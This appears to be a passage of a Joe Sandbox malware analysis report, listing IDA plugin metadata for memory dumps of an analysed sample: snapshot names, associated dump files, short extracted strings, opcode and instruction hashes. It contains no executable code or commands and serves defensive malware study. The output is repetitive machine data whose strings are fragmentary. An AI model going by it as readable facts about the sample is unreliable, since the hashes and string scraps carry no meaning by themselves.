                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: "#<$8977$InA>$InA>$f
                                                                        • API String ID: 2994545307-3216925240
                                                                        • Opcode ID: aec7edcd284aa62e2fde7087a8379ab4dd8377ea5dd8fa23689840d997743692
                                                                        • Instruction ID: 924782074330ef2d82fdb769394746e89a578d685ac3003d81b37176ac89d227
                                                                        • Opcode Fuzzy Hash: aec7edcd284aa62e2fde7087a8379ab4dd8377ea5dd8fa23689840d997743692
                                                                        • Instruction Fuzzy Hash: B122B171A083419FD718CF29C890A6BBBE2EBD9314F188A3DF495873A1D735D945CB82
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff
                                                                        • API String ID: 0-3620105454
                                                                        • Opcode ID: 05f81b5ad0927f296c26a3ef2c52cc07c1708ca7c7ce29b7681f473bfc195916
                                                                        • Instruction ID: 3a9bb4a6e6e7be23491fad229338ca4c118e6915ba0bdd5b55fc82995fe712a3
                                                                        • Opcode Fuzzy Hash: 05f81b5ad0927f296c26a3ef2c52cc07c1708ca7c7ce29b7681f473bfc195916
                                                                        • Instruction Fuzzy Hash: E6E1A27160C7928FC719CF29C49426BFBE2AFD9304F188A6DE8D987392D234D945CB52
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: * ?f$=nn$Q_}$]CmT
                                                                        • API String ID: 0-3038808261
                                                                        • Opcode ID: ae88e714115a026fd3a301f47c3b09cfdd3a439b60582cf28d0d92b26ba343cc
                                                                        • Instruction ID: 5ba05173e52ae9068992875a7c9208af27cc1ed5e90432319aa351fdf4dcb26f
                                                                        • Opcode Fuzzy Hash: ae88e714115a026fd3a301f47c3b09cfdd3a439b60582cf28d0d92b26ba343cc
                                                                        • Instruction Fuzzy Hash: 61B208F3A0C2049FE3046E2DEC8567ABBE9EF94720F1A493DE6C483744EA7558058797
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ZFQ$ZFQ$d{#$xt<
                                                                        • API String ID: 0-942635105
                                                                        • Opcode ID: 98c6c0d303702a0e4fe3d7f7ba92a89d90dcaa138f22b2543c115f97bc2ba9a0
                                                                        • Instruction ID: ba6163f2ade0a5eb3e784b425b886a28d0f7453b62b7c9d257f969edc0f93d5c
                                                                        • Opcode Fuzzy Hash: 98c6c0d303702a0e4fe3d7f7ba92a89d90dcaa138f22b2543c115f97bc2ba9a0
                                                                        • Instruction Fuzzy Hash: A0B219F3A0C2049FE3046E2DEC8567ABBE9EF94720F1A453DEAC4C7744E67598058693
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: !N97$*=}S$V_5{$m7
                                                                        • API String ID: 0-4085011286
                                                                        • Opcode ID: 020a4f130a642566c572589091de9710c42d869dab5299db87cca52faeea2dda
                                                                        • Instruction ID: 27d1a57d940f95219f5f8ff717d3a383b19343f83ef6909dad90c525c8abc027
                                                                        • Opcode Fuzzy Hash: 020a4f130a642566c572589091de9710c42d869dab5299db87cca52faeea2dda
                                                                        • Instruction Fuzzy Hash: 0082F5F360C2049FE3046E2DEC8577ABBE9EF94760F1A492DEAC4C3744EA3558418796
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8?$BcPX$`;|9$`cPX
                                                                        • API String ID: 0-3600580882
                                                                        • Opcode ID: 31b78370e5120163d3757415db5e4195571d5a9fb45ae7cd35ff40533637909b
                                                                        • Instruction ID: 1e7d877e64eed0c7611f4a1cb9c5d6649ec1c1a20c472f67e0d2cec81ac3845d
                                                                        • Opcode Fuzzy Hash: 31b78370e5120163d3757415db5e4195571d5a9fb45ae7cd35ff40533637909b
                                                                        • Instruction Fuzzy Hash: 1BF1BA716083218FD724CF24D8917ABBBE2EF81714F058A2CE9D55B390E7759909CBC6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: a$Ex$OO$|U
                                                                        • API String ID: 0-245304865
                                                                        • Opcode ID: a15122cc1ae94c9aca1ca47f232d8ada915e5fddb4cffba1ef7fa32de659fa8d
                                                                        • Instruction ID: 3810397c719b503c565c22b8eb00d7d46e9a65499218ca63680700388a707231
                                                                        • Opcode Fuzzy Hash: a15122cc1ae94c9aca1ca47f232d8ada915e5fddb4cffba1ef7fa32de659fa8d
                                                                        • Instruction Fuzzy Hash: E8F1E474200B01DFE7658F24C8D07B6B7A3FB99310F58A92CDA97476A5D772E882CB50
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: G{EM$W_w$rO7
                                                                        • API String ID: 0-626217661
                                                                        • Opcode ID: 11a9c464d46893eed695ad02726922f5fac6ea3071b803378855a36556e259d5
                                                                        • Instruction ID: 6c80a933b968d229f6dff8b41700c0e9281da24a033e52b99e7734a7975524bc
                                                                        • Opcode Fuzzy Hash: 11a9c464d46893eed695ad02726922f5fac6ea3071b803378855a36556e259d5
                                                                        • Instruction Fuzzy Hash: 31B216F360C2049FE304AE2DEC4567AB7E9EFD4720F1A853DEAC4C7744EA3598058696
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: bBd$r:d$rBd
                                                                        • API String ID: 0-3352481113
                                                                        • Opcode ID: 44621c00b60df54b9de40cb125417a53e907422d2ba20ccd85fae5bffc572de7
                                                                        • Instruction ID: eb491938410861133e51a78523231e30d4957c4abff70dcaffef0ca06a088d3b
                                                                        • Opcode Fuzzy Hash: 44621c00b60df54b9de40cb125417a53e907422d2ba20ccd85fae5bffc572de7
                                                                        • Instruction Fuzzy Hash: C4420436A08251CFCB08CF68E8A06AAB7F2FF8A314F0994BDD58697351D7359D45CB81
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: bBd$r:d$rBd
                                                                        • API String ID: 0-3352481113
                                                                        • Opcode ID: 9f4074d39b67e1313b5653cb577c282a491566bc1c535511e2370a52562aebd1
                                                                        • Instruction ID: 8a829b0095578dfe81b1d27980ab5109e8504135152b01d5bf28cc1ed2d2262a
                                                                        • Opcode Fuzzy Hash: 9f4074d39b67e1313b5653cb577c282a491566bc1c535511e2370a52562aebd1
                                                                        • Instruction Fuzzy Hash: 5B32F235A08251CFCB08CF68E8A06AAB7F2FF8A314F0994BDD98697351D7359945CB81
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: bBd$r:d$rBd
                                                                        • API String ID: 0-3352481113
                                                                        • Opcode ID: bd3e12d612a708f8a829a5ef5f401b5a2ea55845ccfe9f32d51c2010206f7a9f
                                                                        • Instruction ID: f6187b2b7312e526638462ec458d33c36344398b03c09f3c3d1e98a82e7e068c
                                                                        • Opcode Fuzzy Hash: bd3e12d612a708f8a829a5ef5f401b5a2ea55845ccfe9f32d51c2010206f7a9f
                                                                        • Instruction Fuzzy Hash: 5F12F335A08351CFCB08CF68E8A06AAB7F2FF8A314F19947DE58A97351D7359905CB81
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: %*+($InA>$P
                                                                        • API String ID: 0-1283304554
                                                                        • Opcode ID: 97976a790ca29b8a0cbfbd1c94eba64cb91c1124dd250f52e6fde30edf1e80df
                                                                        • Instruction ID: 84b4153ed5079d171cf326879e8035dc7d6e513b12180e040112d99f6f3c2903
                                                                        • Opcode Fuzzy Hash: 97976a790ca29b8a0cbfbd1c94eba64cb91c1124dd250f52e6fde30edf1e80df
                                                                        • Instruction Fuzzy Hash: 76F106726083754FD329CE28985036FBAE2EBC5714F15862CE9A99B3D1CB71C946C7C1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: :$Zk6i$ho
                                                                        • API String ID: 0-3802070491
                                                                        • Opcode ID: c2ba2d57da65685f8c72de1684c5997fa9cfb10ea5a8e02f617e1be098af9b89
                                                                        • Instruction ID: 45dd2b24a00fa340ca99a7496cf20d2a8b1d2643613a5a8ca2dea51121483dc4
                                                                        • Opcode Fuzzy Hash: c2ba2d57da65685f8c72de1684c5997fa9cfb10ea5a8e02f617e1be098af9b89
                                                                        • Instruction Fuzzy Hash: 2BD1273AA18311CBC7189F38E89126AB3F3FF8A351F09D87CE58697290E7748945C750
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: )$)$IEND
                                                                        • API String ID: 0-588110143
                                                                        • Opcode ID: aca5451f8a4d3568e93f56a45f4fd679ad8351ecc5f6e95e01a2bfbeeedb2f22
                                                                        • Instruction ID: b741dd8241a2cdf6d68ffba7544cf7deaf1edd97efa30c8a424dbf6ffb9a2d72
                                                                        • Opcode Fuzzy Hash: aca5451f8a4d3568e93f56a45f4fd679ad8351ecc5f6e95e01a2bfbeeedb2f22
                                                                        • Instruction Fuzzy Hash: CAF1BB71A487019FE318DF28C88176BBBE2BB95314F04462DE996973C2DB74E914CB86
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: E'_$d/3
                                                                        • API String ID: 0-438992129
                                                                        • Opcode ID: a84ba3b4f35c8b113957f014a201bcf200e85c22d9ce8b6cfb3d6d52c49209c9
                                                                        • Instruction ID: 5e40ef46fedad5845f6fc5d727c5a3e523a36dca5e677d75dff6cbffeee75935
                                                                        • Opcode Fuzzy Hash: a84ba3b4f35c8b113957f014a201bcf200e85c22d9ce8b6cfb3d6d52c49209c9
                                                                        • Instruction Fuzzy Hash: 1AB208F3A0C2009FE304AE29EC8567ABBE5EF94720F16853DEAC5C7744E63598018797
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: DE$[Y$j
                                                                        • API String ID: 0-2398809664
                                                                        • Opcode ID: 88ab8d952711956f8a95d502c82822d4e3642495e8bce97da5d43842f224a8f7
                                                                        • Instruction ID: 40979a83571cae5861f6e674370fc8e1f1b139597c11c01f42546b6824f77c49
                                                                        • Opcode Fuzzy Hash: 88ab8d952711956f8a95d502c82822d4e3642495e8bce97da5d43842f224a8f7
                                                                        • Instruction Fuzzy Hash: ADB1A9B650C3508BC304CF25D8916ABBBE2FFE6318F19992CE4D94B351D7798909CB86
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: F2?7$u;+
                                                                        • API String ID: 0-614950075
                                                                        • Opcode ID: 4e853e09a6b5dc86dccca4574910e8aafd9478ebb99fdde5ae175be2b908d9e0
                                                                        • Instruction ID: b3f0c1499805f25f5ef4817ef35fba8b59e2676f35122afe977e2c0b53e7ed32
                                                                        • Opcode Fuzzy Hash: 4e853e09a6b5dc86dccca4574910e8aafd9478ebb99fdde5ae175be2b908d9e0
                                                                        • Instruction Fuzzy Hash: ECB2F4F3A0C2009FE3046E2DEC8567AFBE9EF94720F168A2DE6C4C7744E63558458697
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: #BMg$n*r(
                                                                        • API String ID: 0-4097719631
                                                                        • Opcode ID: 1652a11c8ac0440dfe7242494c6edfcd621aee6be0a3f7f4ff8c0df418cc7786
                                                                        • Instruction ID: a6dc7c51398f4b775b788a12855b5cf6daaae7e88de2b811263703f29883f398
                                                                        • Opcode Fuzzy Hash: 1652a11c8ac0440dfe7242494c6edfcd621aee6be0a3f7f4ff8c0df418cc7786
                                                                        • Instruction Fuzzy Hash: 18B2C3F360C2009FE314AE2DEC8577ABBE9EF94720F16893DEAC4C7744E63558418696
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "MO$40,G$L]IN
                                                                        • API String ID: 0-2812748645
                                                                        • Opcode ID: 7f90137cebf1ca6644f1c79b9478ea0ea81697f629697acc7402748ef2c5c7eb
                                                                        • Instruction ID: 764c049381f88bfe2d99a04e26705977f443e3a71f7c1402d57f019b212440ab
                                                                        • Opcode Fuzzy Hash: 7f90137cebf1ca6644f1c79b9478ea0ea81697f629697acc7402748ef2c5c7eb
                                                                        • Instruction Fuzzy Hash: B5A1F3705047818BE725CF2AC490722BBE2AF96304F18CA9DD4E68F756C775E406CB90
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Vuq-$^!5
                                                                        • API String ID: 0-3629565551
                                                                        • Opcode ID: 79cfea2c6110db41beae57d1ae9a1762e76c5710a59d12918c41f503374763ec
                                                                        • Instruction ID: d2f1a84e95fbc3fc9214a3d4df86d048a981034d0cf3fa4bee39bb38c5d5764c
                                                                        • Opcode Fuzzy Hash: 79cfea2c6110db41beae57d1ae9a1762e76c5710a59d12918c41f503374763ec
                                                                        • Instruction Fuzzy Hash: 41A2D7F360C204AFE704AE2DEC85A7AFBE9EF94720F16453DE6C4C3744EA7558018696
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "MO$40,G$L]IN
                                                                        • API String ID: 0-2812748645
                                                                        • Opcode ID: 793518b87ed9753ea4e217829a979c210c1c2598f09e48f5e169f93cdf7b1b23
                                                                        • Instruction ID: 4ea052259ae6caeace5a2d8d8ab637cc6f4ebf690716603810be5bd8d9c66925
                                                                        • Opcode Fuzzy Hash: 793518b87ed9753ea4e217829a979c210c1c2598f09e48f5e169f93cdf7b1b23
                                                                        • Instruction Fuzzy Hash: EB91E1715047818FE7258F2AC490762BBE2BF97304F18CA9DD4E64F756C779A406CBA0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Ex$OO$|U
                                                                        • API String ID: 0-1176901884
                                                                        • Opcode ID: 05dd502dc1fcbe83317306e55759231fefbf6a5123eb0765962f72ad6833fb9d
                                                                        • Instruction ID: 100160a09841406a66ccaf41a6eb9f63e8e863d91151a0877da5d1736be68824
                                                                        • Opcode Fuzzy Hash: 05dd502dc1fcbe83317306e55759231fefbf6a5123eb0765962f72ad6833fb9d
                                                                        • Instruction Fuzzy Hash: 4EB19AB4604B01CFD364CF68D890A62B7F2FF5A310F08996CE59A8B7A1D735E841CB50
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "MO$40,G$L]IN
                                                                        • API String ID: 0-2812748645
                                                                        • Opcode ID: 3a7cfeda87f60076a3ff28426c2062d4e9a1ea9c7589cb63cef906fd2d8ed001
                                                                        • Instruction ID: 4d56cd8f7417cbc2755d0d846891e5769c208685a86d2f789c0aef4034756631
                                                                        • Opcode Fuzzy Hash: 3a7cfeda87f60076a3ff28426c2062d4e9a1ea9c7589cb63cef906fd2d8ed001
                                                                        • Instruction Fuzzy Hash: 6781F1715047818FE725CF2AC490762BBE2AF97304F18C69DD4E64F746C779A806CBA1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: $96w$c]
                                                                        • API String ID: 2994545307-247510824
                                                                        • Opcode ID: b59775a8585716b663fdf9159098d154df51b29dd312f100d98fb017d05663ff
                                                                        • Instruction ID: 9af41023703510284b7a6ca77a33cb671fedd042c30efcaeab9c1dc684bc8670
                                                                        • Opcode Fuzzy Hash: b59775a8585716b663fdf9159098d154df51b29dd312f100d98fb017d05663ff
                                                                        • Instruction Fuzzy Hash: 4C22EFB1608752ABE764CF24D8A1B6BB7E3EBC4314F14882CE9898B391D771D845CF52
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: bBd$rBd
                                                                        • API String ID: 0-1607660745
                                                                        • Opcode ID: d5612e17c7cda7be642e9f64404b6a50e69aefaaf0a102152d008070dc13f2df
                                                                        • Instruction ID: ad12a1ea7472e40d3182c0e1420dbe436d0261fe96373c38896748f8a126c36e
                                                                        • Opcode Fuzzy Hash: d5612e17c7cda7be642e9f64404b6a50e69aefaaf0a102152d008070dc13f2df
                                                                        • Instruction Fuzzy Hash: 8A120335A08351CFCB08CF28D8A126EBBF2FF8A314F19996DD58697391D7359905CB81
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RLjo$ZDRW
                                                                        • API String ID: 0-2283519047
                                                                        • Opcode ID: 460ead1e679749fcba5a81b8c3c2386830989bad9fa9b31cb964eba20e3db4c5
                                                                        • Instruction ID: 2803367afb111b11ea7293343b9abf7a04c0f4db2cfb2eb43ce84c610683311c
                                                                        • Opcode Fuzzy Hash: 460ead1e679749fcba5a81b8c3c2386830989bad9fa9b31cb964eba20e3db4c5
                                                                        • Instruction Fuzzy Hash: 8CD1F0B49087409FD714DF64E8816ABBBF2FF96300F14982CE599873A2E778D805CB46
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
